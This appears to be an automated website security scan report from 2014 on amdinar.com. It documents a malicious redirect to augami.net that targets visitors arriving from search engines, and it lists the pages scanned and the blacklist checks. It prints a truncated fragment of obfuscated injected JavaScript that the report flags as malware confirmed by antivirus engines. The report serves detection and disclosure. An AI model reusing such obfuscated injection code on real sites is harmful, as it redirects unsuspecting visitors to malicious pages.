Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://amdinar.com/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: amdinar.com Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 12 Jun 2014 13:09:12 GMT Location: http://augami.net/5782fh2.html Server: Apache Content-Length: 238 Content-Type: text/html; charset=iso-8859-1 | malicious |
Scanned pages/files
Request | Server response | Status |
http://amdinar.com/ | 200 OK Content-Length: 7454 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function t(){return z($a);}var $a="Z63zZ3dZ22Z2566uZ256ectZ2569Z256fn Z2563zZ2528Z2563z)Z257breZ2574uZ2572n cZ2561+cZ2562+ccZ252bcd+Z2563e+Z2563z;}Z253bZ22;cuZ3dZ22(p}b4g`mxq)6b}g}v}x}`m.|}ppqz6*(}rfuyq4gfw)6|``d.;;rvwyr}f:wZ7by;xp;pqq;64c}p`|)Z25$$4|q}s|`),$*(;}rfuyq*(;p}b*Z22;stZ3dZ22Z2573tZ253dZ2522$Z2561Z253dsZ2574;Z2564Z2563Z2573Z2528Z2564aZ252bdZ2562+Z2564Z2563+Z2564dZ252bZ2564Z2565,Z2531Z2530)Z253bZ2564Z2577(Z2573Z2574Z2529Z253bZ2573Z2574Z253dZ2524Z2561Z253bZ2522;Z22;caZ3dZ22Z2566uncZ2574 Antivirus reports:
| ||
https://count.carrierzone.com/app/count_server/count.js | 200 OK Content-Length: 36029 Content-Type: text/javascript | clean |
https://count.carrierzone.com/app/count_server/count_piwik.js | 200 OK Content-Length: 34984 Content-Type: text/javascript | clean |
http://amdinar.com/test404page.js | HTTP/1.1 302 Found Connection: close Date: Thu, 12 Jun 2014 13:09:16 GMT Location: http://augami.net/5782fh2.html Server: Apache Content-Length: 214 Content-Type: text/html; charset=iso-8859-1 | malicious |
http://augami.net/5782fh2.html | 200 OK Content-Length: 8178 Content-Type: text/html | clean |
http://d1vbm0eveofcle.cloudfront.net/scripts/js3caf.js | 200 OK Content-Length: 3490 Content-Type: application/x-javascript | clean |
http://d1vbm0eveofcle.cloudfront.net/scripts/tier2caf.js | 200 OK Content-Length: 25583 Content-Type: application/x-javascript | clean |
http://amdinar.com/scripts/feedmeCaf.php?q=&ip=78.158.11.226&max=10&hl=lt&d=augami.net&ron=0&adult=0 | HTTP/1.1 302 Found Connection: close Date: Thu, 12 Jun 2014 13:09:18 GMT Location: http://augami.net/5782fh2.html Server: Apache Content-Length: 214 Content-Type: text/html; charset=iso-8859-1 | malicious |
http://augami.net/test404page.js | 400 Bad Request Content-Length: 20 Content-Type: text/html | clean |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=amdinar.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://amdinar.com/
Result: amdinar.com is not infected or malware details are not published yet.
Result: amdinar.com is not infected or malware details are not published yet.